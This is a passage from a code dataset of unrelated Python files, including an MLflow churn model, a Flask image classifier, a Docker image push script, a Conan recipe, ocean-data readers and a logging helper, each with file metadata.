leaf_size=leaf_size, metric='minkowski',metric_params=None, n_jobs=1, n_neighbors=n_neighbors, p=2,weights='uniform')\n model_accuracy,model_roc_auc, model_f1_score=telecom_churn_prediction(knn,os_smote_X,test_X,os_smote_Y,test_Y)\n\n \n mlflow.log_metric(\"AUC\", model_roc_auc)\n mlflow.log_metric(\"Accuracy\", model_accuracy)\n mlflow.log_metric(\"F1\", model_f1_score)\n \n \"\"\"ADDITIONAL CODE\"\"\"\n mlflow.sklearn.log_model(knn, \"knn_model\")\n mlflow.sklearn.save_model(knn, \"knn_s_model\")\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"2churn_mlflow_project.py","file_name":"2churn_mlflow_project.py","file_ext":"py","file_size_in_byte":6981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"376030185","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pandas import read_csv\n\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\ndataframe = read_csv('D:/pycharm/PROJECT34/ML_STUDY\\LSTM_learn-master/international-airline-passengers.csv',\n usecols=[1],engine='python',skip_footer=3)\ndataset = dataframe.values\ndataset = dataset.astype('float32')\ndef create_dataset(dataset,look_back = 1):\n datax,datay = [],[]\n for i in range(len(dataset)-look_back-1):\n a = dataset[i:(i+look_back),0]\n datax.append(a)\n datay.append(dataset[i+look_back,0])\n return np.array(datax),np.array(datay)\nnp.random.seed(7)\nscaler = MinMaxScaler(feature_range=(0,1))\ndataset = scaler.fit_transform(dataset)\ntrain_size = int(len(dataset)*0.67)\ntest_size = len(dataset)-train_size\ntrain,test = dataset[0:train_size,:],dataset[train_size:len(dataset),:]\n\nlook_back = 2\ntrainx,trainy = create_dataset(train,look_back)\ntestx,testy = create_dataset(test,look_back)\n\ntrainx = np.reshape(trainx,(trainx.shape[0],1,trainx.shape[1]))\n\ntestx = np.reshape(testx,(testx.shape[0],1,testx.shape[1]))\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test_20180301_lstm.py","file_name":"test_20180301_lstm.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650608483","text":"import requests\nimport json\nimport traceback\nimport warnings\nimport sys\nimport docker\n\nwarnings.filterwarnings(\"ignore\")\n\nrepo_ip = 'image.kaifa-empower.com'\n\nf1 = open('docker_images.txt','r')\ndocker_images = f1.readlines()\nclient = docker.from_env()\nsave_name_list = []\nfor image_name in docker_images:\n real_name = image_name.strip().split('/',1)[1]\n image = client.images.get(image_name.strip())\n image.tag(repo_ip + '/'+real_name)\n save_name_list.append( repo_ip + '/'+real_name)\nfor image in save_name_list:\n print('----push '+image+'start ----')\n client.images.push(image.strip())\n\n\nfor image_name in docker_images:\n client.images.remove(image_name.strip())\n\nfor real_name in save_name_list:\n client.images.remove(real_name)\n\n\nf1.close()\n","sub_path":"docker/push_image.py","file_name":"push_image.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"91141854","text":"from flask import Flask, render_template, request\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom tensorflow.keras.models import model_from_json\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\nfrom werkzeug.utils import secure_filename\r\n\r\nimport sys\r\nimport os\r\n\r\n\r\nsys.path.append(os.path.abspath('./model'))\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n\r\ndef init():\r\n json_file = open('./model/model_128_64.json', 'r')\r\n loaded_model_json = json_file.read()\r\n json_file.close()\r\n loaded_model = model_from_json(loaded_model_json)\r\n\r\n loaded_model.load_weights(\"./model/model_128_64.h5\")\r\n print(\"Loaded model from disk\")\r\n\r\n loaded_model.compile(loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n optimizer='adam', metrics=['accuracy'])\r\n\r\n return loaded_model\r\n\r\nglobal model\r\n\r\nmodel = init()\r\n\r\nglobal classes\r\nclasses = pd.read_csv('./model/class_labels.csv')\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\n\r\ndef model_predict():\r\n # Get the file from post request\r\n f = request.files['file']\r\n\r\n # Save the file to ./uploads\r\n basepath = os.path.dirname(__file__)\r\n file_path = os.path.join(basepath, 'uploads', secure_filename(f.filename))\r\n f.save(file_path)\r\n print(file_path)\r\n\r\n img = image.load_img(file_path, target_size=(32,32))\r\n x = image.img_to_array(img)\r\n x = x / 255.\r\n x = x[np.newaxis, :, :, :1]\r\n\r\n out = model.predict(x)\r\n print(out)\r\n response = classes.iloc[(np.argmax(out))][1]\r\n print(response)\r\n return response\r\n\r\nif __name__ == '__main__':\r\n port = int(os.environ.get(\"PORT\", 5000))\r\n app.run(port=port)","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639741029","text":"from django.db import models\nimport pystache\n\n\nclass Dishrating(models.Model):\n kindergarten = models.ForeignKey(\n \"kindergarten.Kindergarten\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n verbose_name=\"Kindergarten\",\n )\n date = models.DateField(\n null=True,\n blank=True,\n verbose_name=\"Date\",\n help_text=\"Please select the date of the dish that you wish to comment on.\",\n )\n dish = models.ForeignKey(\n \"kindergartendish.KindergartenDish\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n verbose_name=\"Choose a dish\",\n )\n children_satisfaction = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Did your child like the dish?\",\n help_text=\"(1 = „it was awful", 5 = „it was delicious")\",\n )\n parent_satisfaction = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Do you think it is proper for a kid?\",\n help_text=\"(1 = „it is not", 5 = „it is")\",\n )\n health = models.CharField(\n choices=(\n (\"one\", \"1\"),\n (\"two\", \"2\"),\n (\"three\", \"3\"),\n (\"four\", \"4\"),\n (\"five\", \"5\"),\n ),\n max_length=5,\n null=True,\n blank=True,\n verbose_name=\"Do you think it is healthy?\",\n help_text=\"(1 = „it is very bad for my health", 5 = „it is very healthy")\",\n )\n comment = models.TextField(\n null=True,\n blank=True,\n verbose_name=\"Do you have any further comments?\",\n )\n\n wq_label_template = \"{{dish}}\"\n\n def __str__(self):\n return pystache.render(self.wq_label_template, self)\n\n class Meta:\n verbose_name = \"dishrating\"\n verbose_name_plural = \"dishratings\"\n","sub_path":"db/dishrating/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635997717","text":"from tkinter import *\n\ndef data_to_file():\n data_write = open (item_name_entry.get()+\".rr\", \"w\")\n data_write.write(item_name_entry.get())\n data_write.write(\"\\n\" + str(effectiveness_entry.get()))\n data_write.write(\"\\n\" + str(description_entry.get()))\n data_write.write(\"\\n\" + str(model_entry.get()))\n data_write.write(\"\\n\" + str(type_var.get()))\n data_write.close ()\n\ndef clear_entry():\n item_name_entry.delete(0, len(item_name_entry.get()))\n effectiveness_entry.delete(0, len(effectiveness_entry.get()))\n description_entry.delete(0, len(description_entry.get()))\n model_entry.delete(0, len(model_entry.get()))\n model_entry.delete(0, len(model_entry.get()))\n\nroot = Tk()\n#config\nroot.title(\"Strainger Form\")\nroot.configure(background=\"black\")\n\n#vars\ntype_var = StringVar(root)\ntype_var.set(\"heal\") # initial value\n\n#labels\nitem_name_label = Label(root, text=\"Item Name\", bg=\"black\", fg=\"white\").grid(row=0, column=10)\neffectiveness_label = Label(root, text=\"Effectiveness\", bg=\"black\", fg=\"white\").grid(row=1, column=10)\ndescription_label = Label(root, text=\"Description\", bg=\"black\", fg=\"white\").grid(row=2, column=10)\nmodel_label = Label(root, text=\"3d Model\", bg=\"black\", fg=\"white\").grid(row=3, column=10)\ntype_label = Label(root, text=\"Type\", bg=\"black\", fg=\"white\").grid(row=4, column=10)\n\n\n#entries\nitem_name_entry = Entry(root, bg=\"black\", fg=\"white\")\nitem_name_entry.grid(row=0)\n\neffectiveness_entry = Entry(root, bg=\"black\", fg=\"white\")\neffectiveness_entry.grid(row=1)\n\ndescription_entry = Entry(root, bg=\"black\", fg=\"white\")\ndescription_entry.grid(row=2)\n\nmodel_entry = Entry(root, bg=\"black\", fg=\"white\")\nmodel_entry.grid(row=3)\n\ntype_entry = OptionMenu(root, type_var, \"heal\", \"equip\", \"body\", \"other\")\ntype_entry.config(bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",width=15)\ntype_entry[\"menu\"].config(bg=\"black\", fg=\"white\")\ntype_entry.grid(row=4)\n\n\n#buttons\nCLEAR = Button(root, text=\"CLEAR\", bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",command=clear_entry, width=10).grid(row=5, column=10)\nOK = Button(root, text=\"OK\", bg=\"black\", fg=\"white\", activeforeground=\"white\", activebackground=\"black\",command=data_to_file,width=10).grid(row=6, column=10)\nroot.mainloop()\n","sub_path":"strainger_input.py","file_name":"strainger_input.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"333006449","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Laurent El Shafey \n# Fri Jan 27 16:43:40 2012 +0100\n#\n# Copyright (C) 2011-2013 Idiap Research Institute, Martigny, Switzerland\n\n\"\"\"Tests for statistical methods\n\"\"\"\n\nimport os, sys\nimport unittest\nimport bob\nimport numpy\n\nclass NorminvTest(unittest.TestCase):\n \"\"\"Tests the norminv function of bob\"\"\"\n\n def test01_norminv(self):\n\n # Reference values\n sols_d05 = -1.64485362695\n sols_d50 = 0.\n sol_m2s4_d37 = 0.672586614252\n sol_m2s4_d48 = 1.799385666141\n\n # Values obtained with bob\n b_d05 = bob.math.normsinv(0.05)\n b_d50 = bob.math.normsinv(0.5)\n b_m2s4_d37 = bob.math.norminv(0.37, 2., 4.)\n b_m2s4_d48 = bob.math.norminv(0.48, 2., 4.)\n \n # Compare\n self.assertTrue( (abs(sols_d05 - b_d05) < 1e-6), True )\n self.assertTrue( (abs(sols_d50 - b_d50) < 1e-6), True )\n self.assertTrue( (abs(sol_m2s4_d37 - b_m2s4_d37) < 1e-6), True )\n self.assertTrue( (abs(sol_m2s4_d48 - b_m2s4_d48) < 1e-6), True )\n","sub_path":"python/bob/math/test/test_norminv.py","file_name":"test_norminv.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191636763","text":"import threading\nimport cv2\nfrom time import time\n\nimport asyncio\n\nclass VideoCaptureAsync:\n def __init__(self, src=0, width=640, height=480,framerate=20,oversample=8):\n self.src = src\n self.cap = cv2.VideoCapture(self.src)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n self.cap.set(cv2.CAP_PROP_FPS, framerate)\n\n self.grabbed, self.frame = self.cap.read()\n self.started = False\n self.read_lock = threading.Lock()\n\n self.framerate = framerate\n self.last_cap = time()\n self.oversample = oversample\n\n def set(self, var1, var2):\n self.cap.set(var1, var2)\n\n def start(self):\n if self.started:\n print('[!] Threaded video capturing has already been started.')\n return None\n self.started = True\n self.thread = threading.Thread(target=self.planUpdate, args=())\n self.thread.start()\n return self\n\n def planUpdate(self):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n task = loop.create_task(self.update())\n try:\n loop.run_until_complete(task)\n except asyncio.CancelledError:\n pass\n finally:\n loop.close()\n\n @asyncio.coroutine\n def update(self):\n while self.started:\n t = time()\n with self.read_lock:\n cap = t - self.last_cap >= 1/self.framerate\n if cap:\n grabbed, frame = self.cap.read()\n t = time()\n with self.read_lock:\n if cap:\n self.last_cap = t\n self.grabbed = grabbed\n self.frame = frame\n yield from asyncio.sleep(1.0/self.framerate/self.oversample)\n\n def read(self):\n with self.read_lock:\n grabbed = self.grabbed\n frame = self.frame.copy() if grabbed else self.frame\n return grabbed, frame\n\n def stop(self):\n self.started = False\n self.thread.join()\n\n def __exit__(self, exec_type, exc_value, traceback):\n self.cap.release()\n","sub_path":"server/VideoCaptureAsync.py","file_name":"VideoCaptureAsync.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"110206054","text":"from conans import ConanFile, tools\nfrom conans.errors import ConanException\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass GnuConfigConan(ConanFile):\n name = \"gnu-config\"\n description = \"The GNU config.guess and config.sub scripts\"\n homepage = \"https://savannah.gnu.org/projects/config/\"\n url = \"https://github.com/conan-io/conan-center-index\"\n topics = (\"gnu\", \"config\", \"autotools\", \"canonical\", \"host\", \"build\", \"target\", \"triplet\")\n license = \"GPL-3.0-or-later\", \"autoconf-special-exception\"\n no_copy_source = True\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def package_id(self):\n self.info.header_only()\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _extract_license(self):\n txt_lines = tools.load(os.path.join(self.source_folder, self._source_subfolder, \"config.guess\")).splitlines()\n start_index = None\n end_index = None\n for line_i, line in enumerate(txt_lines):\n if start_index is None:\n if \"This file is free\" in line:\n start_index = line_i\n if end_index is None:\n if \"Please send patches\" in line:\n end_index = line_i\n if not all((start_index, end_index)):\n raise ConanException(\"Failed to extract the license\")\n return \"\\n\".join(txt_lines[start_index:end_index])\n\n def package(self):\n tools.save(os.path.join(self.package_folder, \"licenses\", \"COPYING\"), self._extract_license())\n self.copy(\"config.guess\", src=self._source_subfolder, dst=\"bin\")\n self.copy(\"config.sub\", src=self._source_subfolder, dst=\"bin\")\n\n def package_info(self):\n bin_path = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\".format(bin_path))\n self.env_info.PATH.append(bin_path)\n\n self.user_info.CONFIG_GUESS = os.path.join(bin_path, \"config.guess\")\n self.user_info.CONFIG_SUB = os.path.join(bin_path, \"config.sub\")\n","sub_path":"recipes/gnu-config/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411992622","text":"from PIL import Image\nimport numpy as np\nfrom rectangle import RectangleTakeIn\nclass ImageExtractor:\n\n def __init__(self):\n print(\"code here\")\n\nimage = Image.open(\"images.jpeg\")\n\nwidth,height = image.size\nfound_pixels = []\nfor index, pixel in enumerate(image.getdata()):\n if pixel >= (255,255,255):\n found_pixels.append(index)\n\nx,y = divmod(index, width)\nfound_pixels_coords = [divmod(index, width) for index in found_pixels]\ncoords = tuple(found_pixels_coords)\n\nRectangleTakeIn(coords)\n","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"588148556","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 14 11:35:27 2017\n\n@author: ifmor\n\"\"\"\n\n#Distancia euclidiana\nimport numpy as np\n\ndatos=np.array([[0, 3, 0],\n [2, 0, 0],\n [0, 1, 3],\n [0, 1, 2],\n [-1, 0, 1],\n [1, 1, 1],\n [0, 0, 0]])\n\neuclid = []\n\nfor i in range(6):\n \n resta=datos[-1]-datos[i]\n cuadrado=resta**2\n eucl=np.sqrt(cuadrado.sum(axis=0))\n euclid.append(eucl)\n\nprint(resta)\nprint(cuadrado)\nprint(eucl)\nprint(euclid)\n","sub_path":"Taller 1/Distancia euclidiana.py","file_name":"Distancia euclidiana.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"425717590","text":"import awswrangler\n\n\ndef lambda_handler(event, context):\n\n bucket = event.get(\"--bucket\")\n key = event.get(\"--workload\")\n output_name = key.replace(\".csv\", \"\")\n path_input = \"s3://\" + bucket + \"/\" + key\n path_output = \"s3://\" + bucket + \"/lambda_output/\" + output_name\n\n print(\"bucket: \" + bucket)\n print(\"key: \" + key)\n print(\"output_name: \" + output_name)\n print(\"path_input: \" + path_input)\n print(\"path_output: \" + path_output)\n\n df = awswrangler.s3.read(path=path_input)\n awswrangler.s3.write(\n df=df, path=path_output, file_format=\"parquet\", partition_cols=[\"col3\"]\n )\n","sub_path":"benchmarks/serverless_etl/etls/lambda_script.py","file_name":"lambda_script.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529606179","text":"import sys\nfrom collections import deque\n\nsys.stdin = open(\"input.txt\", \"r\")\n\nT = int(input().rstrip())\ndef initial_check(W):\n for i in str(W):\n if int(i) not in number:\n return False\n return True\n\ndef operator_func(cur_num, i, prev_opr):\n if prev_opr == 1:\n ans = cur_num + i\n elif prev_opr == 2:\n ans = cur_num - i\n elif prev_opr == 3:\n ans = cur_num * i\n else:\n ans = cur_num // i\n return ans\n\n\ndef bfs(List):\n global min_num, max_num,W, min_touch_count\n while List:\n current = List.popleft()\n cur_num = current[0] #지금까지 숫자\n next = current[1] #연산해야할 숫자\n prev_opr =current[2] #이전에 했던 연산 (0 이면 숫자고른거, 아니면 이전에 했던 연산)\n opr_count =current[3] #연산 count\n very_prev_opr = current[4]\n touch_count = current[5]\n\n if touch_count >= min_touch_count:\n return 100000\n\n if prev_opr == 0:\n for j in operator:\n if opr_count == 1:\n next_num = operator_func(cur_num,next,very_prev_opr)\n if next_num == W:\n return touch_count + 1\n List.append((next_num,0,j,1,j,touch_count+1))\n else:\n List.append((cur_num,next,j,opr_count+1,j,touch_count+1))\n for i in number:\n next_num = int(str(next) + str(i))\n if next_num !=0 and min_num < next_num < max_num:\n List.append((cur_num,next_num,0,opr_count,very_prev_opr,touch_count+1))\n elif prev_opr !=0:\n for i in number:\n next_num = int(str(next) + str(i))\n if next_num !=0 and min_num < next_num < max_num:\n List.append((cur_num,next_num,0,opr_count,very_prev_opr,touch_count+1))\n\n\nfor test in range(1,T+1):\n #터치가능한 숫자들의 개수, 터치 가능한 연산자들의 개수, 최대 터치가능한 횟수\n N,O,M = tuple(map(int,input().rstrip().split()))\n number =[int(i) for i in input().rstrip().split()] # 터치가능한 숫자들\n operator = [int(i) for i in input().rstrip().split()] #터치가능한 연산자 (+:1,-:2, *:3, /:4)\n W = int(input().rstrip()) #원하는 숫자\n min_num, max_num = -1, 1000\n min_touch_count = M+1\n\n if initial_check(W):\n min_touch_count =len(str(W))\n print(min_touch_count)\n continue\n else:\n for cur in number:\n List = deque()\n List.append((cur,0,0,0,0,1))\n touch_count = bfs(List)\n if touch_count+1 < min_touch_count:\n min_touch_count = touch_count+1\n if min_touch_count == M+1:\n print(-1)\n else:\n print(min_touch_count)\n","sub_path":"4311. [연습문제] 오래된 스마트폰.py","file_name":"4311. [연습문제] 오래된 스마트폰.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"323132051","text":"\n#################################-- restart Script --#################################\n## This section tries for arduino connection on a specified port ##\n######################################################################################\n\n\n#! /bin/env python3\nimport os\nimport sys\n\ndef like_cheese():\n var = input(\"Hi! I like cheese! Do you like cheese?\").lower()\n if var == \"yes\":\n print(\"That's awesome!\")\n\nif __name__ == '__main__':\n like_cheese()\n os.execv(__file__, sys.argv) # Run a new iteration of the current script, providing any command line args from the current iteration.\n","sub_path":"scripts/Base_Build_Systems/HVAC/restart_script.py","file_name":"restart_script.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"348031496","text":"#coding:utf-8\n\n# 20151221作成。\n# GECCO2のデータを読み込むためのモジュール。\n\nnz=50\nnx=360\nny=180\n\n\ndef nc_read(year,month,var,depth):\n\t# 1地点につき1つのデータしかないものに関してはdepthに何を入れても構わない。\n\t# 50層あるデータに関しては、depth=1とすると、5メートル水深でのデータが得られるようにする。\n\timport netCDF4\n\timport numpy as np\n\timport subroutine\n\timport GECCO2\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\td=subroutine.celldata(a,'var',var,'dim')\n\tncfile=subroutine.dat_dir()+'GECCO2/NetCDF/'+filename+'29_34_55.nc'\n\tn=GECCO2.ym_to_n(year,month)\n\t# print ncfile\n\tnc=netCDF4.Dataset(ncfile,'r')\n\tif d=='3D':\n\t\tif depth != 0:\n\t\t\tdata=nc.variables[filename][n,depth-1,:,:]\n\t\t\tdata=np.reshape(data,(ny,nx))\n\t\telse:\n\t\t\tdata=np.ones((ny,nx,nz))\n\t\t\tfor k in range(0,nz):\n\t\t\t\tdata_2D=nc.variables[filename][n,k,:,:]\n\t\t\t\tdata[:,:,k]=np.reshape(data_2D,(ny,nx))\n\telif d=='2D':\n\t\tdata=nc.variables[filename][n,:,:]\n\t\tdata=np.reshape(data,(ny,nx))\n\n\tnc.close()\n\treturn data\n\ndef grib_read(year,month,var,depth):\n\timport numpy as np\n\timport subroutine\n\timport GECCO2\n\tdata_dir=subroutine.dat_dir()+'GECCO2/binary/each_data/'\n\tformat_of_data=\"<\"+str(nx*ny)+\"f\"\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\td=subroutine.celldata(a,'var',var,'dim')\n\tdt=np.dtype([(\"data\",format_of_data)])\n\tstryear,strmonth=subroutine.strym(year,month)\n\tfd=open(data_dir+\"/\"+stryear+strmonth+\"/\"+filename+\".out\",\"r\")\n\tif d=='3D':\n\t\tcount=nz\n\telif d=='2D':\n\t\tcount=1\n\tchunk=np.fromfile(fd,dtype=dt,count=count)\n\tif depth != 0:\n\t\tdata=chunk[depth-1]['data']\n\t\tdata=np.reshape(data,(ny,nx))\n\telse:\n\t\tdata=np.ones((ny,nx,nz))\n\t\tfor k in range(0,nz):\n\t\t\tdata_2D=chunk[k]['data']\n\t\t\tdata[:,:,k]=np.reshape(data_2D,(ny,nx))\n\treturn data\n\n\ndef n_to_ym(n):\t\t\t\t\t# n=0 ->1948年1月、n=803 -> 2014年12月\n\tyear=n//12+1947\n\tmonth=n%12+1\n\treturn [year,month]\n\ndef ym_to_n(year,month):\t\t# 1948年1月 -> n=0, 2014年12月 -> n=803\n\treturn (year-1948)*12+(month-1)\n\ndef get_grid_value(var): # 荒川Cグリッドだからややこしい\n\t# しかもwのzgridも通常とは異なる様子。水温や塩分の鉛直座標のちょうど中間をとっている。これに関しては今回無視することとする。\n\timport netCDF4\n\timport subroutine\n\ta=subroutine.read_meta_data('var')\n\tfilename=subroutine.celldata(a,'var',var,'GECCO2_fn')\n\tncfile=subroutine.dat_dir()+'GECCO2/NetCDF/'+filename+'29_34_55.nc'\n\tnc=netCDF4.Dataset(ncfile,'r')\n\tvar_p=nc.variables['Depth'][:]\n\txgrid=nc.variables['lon'][:]\n\tygrid=nc.variables['lat'][:]\n\tnc.close()\n\treturn [xgrid,ygrid,var_p]\n","sub_path":"GECCO2.py","file_name":"GECCO2.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"625747986","text":"\"\"\"\n853. Car Fleet\nMedium\n\nN cars are going to the same destination along a one lane road. The destination is target miles away.\n\nEach car i has a constant speed speed[i] (in miles per hour), and initial position position[i] miles towards the target along the road.\n\n***A car can never pass another car ahead of it, but it can catch up to it, and drive bumper to bumper at the same speed.\n\nThe distance between these two cars is ignored - they are assumed to have the same position.\n\nA car fleet is some non-empty set of cars driving at the same position and same speed. Note that a single car is also a car fleet.\n\nIf a car catches up to a car fleet right at the destination point, it will still be considered as one car fleet.\n\nHow many car fleets will arrive at the destination?\n\nExample 1:\n\nInput: target = 12, position = [10,8,0,5,3], speed = [2,4,1,1,3]\nOutput: 3\nExplanation:\nThe cars starting at 10 and 8 become a fleet, meeting each other at 12.\nThe car starting at 0 doesn't catch up to any other car, so it is a fleet by itself.\nThe cars starting at 5 and 3 become a fleet, meeting each other at 6.\nNote that no other cars meet these fleets before the destination, so the answer is 3.\n\nExplanation\nSort cars by the start positions pos\nLoop on each car from the end to the beginning\nCalculate its time needed to arrive the target\ncur records the current biggest time (the slowest)\n\nIf another car needs less or equal time than cur,\nit can catch up this car fleet.\n\nIf another car needs more time,\nit will be the new slowest car,\nand becomes the new lead of a car fleet.\n\nforloop에서\n=> sorted에서 position이 앞서서 앞인데 speed떄문에 시간은 더걸리는 경우가 있으니까 그걸로 체크하는 것\n\"\"\"\n\n\nclass Solution(object):\n def carFleet(self, target, pos, speed):\n \"\"\"\n :type target: int\n :type position: List[int]\n :type speed: List[int]\n :rtype: int\n \"\"\"\n time = [float(target - p) / s for p, s in sorted(zip(position, speed))]\n res = cur = 0\n for t in time[::-1]:\n if t > cur:\n res += 1\n cur = t\n return res\n\n\ntarget, position, speed = 12, [10, 8, 0, 5, 5, 3], [2, 4, 1, 3, 1, 3]\ns = Solution()\ntest = s.carFleet(target, position, speed)\nprint(test)\n","sub_path":"sort_medium/1128_car_fleet.py","file_name":"1128_car_fleet.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"139374967","text":"#/usr/bin/env python3\n# coding=utf-8\n\n# stdlib\nimport socket\nimport sys\nimport platform\nimport array\ntry:\n\timport selectors\nexcept ImportError:\n\t# py2 compatibility\n\timport selectors2 as selectors\nimport socket\n\n__all__=(\"BaseBackend\", \"Queue\", \"BackendLogger\")\n\nclass BackendLogger(object):\n\t\"\"\"\n\t\tLogger for backends.\n\t\tIt can print log on stdout and in a file\n\t\tIf you would log errors, you can add Exception to a logger\n\t\tand also raise that\n\n\t\tLevels:\n\t\t\t- msg:\n\t\t\t\t- chat data from backends\n\t\t\t\t- format: None\n\t\t\t\t- color: None\n\t\t\t- info:\n\t\t\t\t- useful infos for user\n\t\t\t\t- format [INFO]\n\t\t\t\t- color: green\n\t\t\t- warning:\n\t\t\t\t- warning about backend state\n\t\t\t\t- format: [WARNING]\n\t\t\t\t- color: yellow\n\t\t\t- error:\n\t\t\t\t- Exception from backend, usually was normal exception\n\t\t\t\t- format: [ERROR]\n\t\t\t\t- color: magenta\n\t\t\t- critical:\n\t\t\t\t- Crash of program, it raise the exception\n\t\t\t\t- format: [CRITICAL]\n\t\t\t\t- color: red\n\t\t\t- debug:\n\t\t\t\t- Debug informations\n\t\t\t\t- format: [DEBUG]\n\t\t\t\t- color: cyan\n\t\"\"\"\n\tLEVELS=(\"critical\", \"msg\", \"info\", \"warning\", \"error\", \"debug\")\n\tdef __init__(self, level=0, filelog=None, allow_print=True, raise_error=False):\n\t\t\"\"\"\n\t\t\tCreate a Logger\n\t\t\tNOTE: \tdon't add parameter level directly because it's in binary format,\n\t\t\t\t\tuse level_encode instead.\n\t\t\"\"\"\n\t\tsuper(BackendLogger, self).__init__()\n\t\tself._level=level\n\t\tself.allow_print=allow_print\n\t\tself.raise_error=raise_error\n\t\tif platform.system().upper()==\"LINUX\":\n\t\t\tself._allow_color=True\n\t\tself.filelog=filelog\n\t@staticmethod\n\tdef level_encode(**kwargs):\n\t\tkwargs.setdefault(\"critical\", False)\n\t\tkwargs.setdefault(\"msg\", False)\n\t\tkwargs.setdefault(\"info\", False)\n\t\tkwargs.setdefault(\"warning\", False)\n\t\tkwargs.setdefault(\"error\", False)\n\t\tkwargs.setdefault(\"debug\", False)\n\t\tlogargs=array.array(\"B\")\n\t\tfor F in BackendLogger.LEVELS:\n\t\t\tlogargs.append(kwargs[F])\n\t\treturn logargs\n\tdef _writelog(self, typelog, msg, color=None):\n\t\tif self.allow_print:\n\t\t\tif self._allow_color and color is not None:\n\t\t\t\tprint(\"[\\033[{2};1;1m{0}\\033[0m]: {1}\".format(typelog, msg, color))\n\t\t\telse:\n\t\t\t\tprint(msg)\n\t\tif self.filelog is not None:\n\t\t\tself.filelog.write(\"[{}]: []\".format(typelog, msg))\n\tdef checklevel(self, level):\n\t\treturn self._level[level]\n\t# log levels\n\tdef debug(self, msg):\n\t\tif self.checklevel(5):\n\t\t\tself._writelog(\"DEBUG\", msg, 36)\n\t\t\treturn True\n\t\treturn False\n\tdef msg(self, msg):\n\t\tif self.checklevel(1):\n\t\t\tif self.allow_print:\n\t\t\t\tprint(msg)\n\t\t\tif self.filelog is not None:\n\t\t\t\tself.filelog.write(\"[MSG]: \" + msg)\n\tdef info(self, msg):\n\t\tif self.checklevel(2):\n\t\t\tself._writelog(\"INFO\", msg, 32)\n\t\t\treturn True\n\t\treturn False\n\tdef warning(self, msg):\n\t\tif self.checklevel(3):\n\t\t\tself._writelog(\"WARNING\", msg, 33)\n\t\t\treturn True\n\t\treturn 